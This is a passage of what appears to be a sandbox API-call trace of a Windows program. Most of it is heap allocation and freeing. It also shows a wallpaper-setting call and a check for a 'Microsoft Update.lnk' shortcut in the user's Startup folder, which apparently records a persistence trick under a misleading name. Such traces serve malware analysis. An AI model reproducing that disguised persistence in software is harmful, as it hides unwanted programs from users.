0x2a72548 [0234.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0234.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0234.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0234.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0234.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0234.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0234.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0234.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0234.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0234.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0234.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0234.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0234.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0234.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0234.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0234.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0234.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0234.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0234.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0234.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0234.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0234.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0234.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0234.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0234.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0234.716] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0234.716] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0234.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0234.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0234.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0234.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7200 [0234.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f7200, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0234.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0234.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0234.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0234.717] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0234.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0234.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0234.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0234.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0234.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0234.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0234.717] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0234.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0234.717] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0234.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0234.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0234.718] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0234.718] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0234.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865490 [0234.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0234.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0234.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0234.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0234.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0234.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0234.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0234.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0234.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0234.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0234.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0234.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0234.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0234.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0234.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0234.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0234.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0234.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0234.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0234.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0234.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0234.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0234.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0234.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0234.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0234.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0234.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0234.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0234.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0234.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0234.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0234.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0234.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0234.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0234.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0234.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0234.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0234.800] FreeLibrary (hLibModule=0x76240000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0234.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0234.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38656b8 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865490 | out: hHeap=0x2af0000) returned 1 [0234.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0234.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0234.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0234.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0234.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0234.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0234.802] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0234.802] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38656b8 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0234.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0234.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0234.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0234.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0234.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0234.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0234.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0234.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0234.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0234.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0234.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0234.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0234.804] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0234.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0234.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0234.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0234.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0234.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0234.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0234.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0234.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0234.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0234.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0234.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0234.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0234.804] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0234.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0234.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0234.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5c0 [0234.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0234.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0234.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0234.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0234.805] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8cf298 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0234.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0234.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a683a8 [0234.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0234.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0234.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0234.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0234.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0234.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0234.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0234.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0234.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0234.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0234.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0234.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0234.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0234.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0234.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0234.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0234.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0234.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0234.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0234.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0234.806] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0234.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0234.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0234.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0234.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0234.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0234.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0234.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0234.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0234.806] PeekMessageW 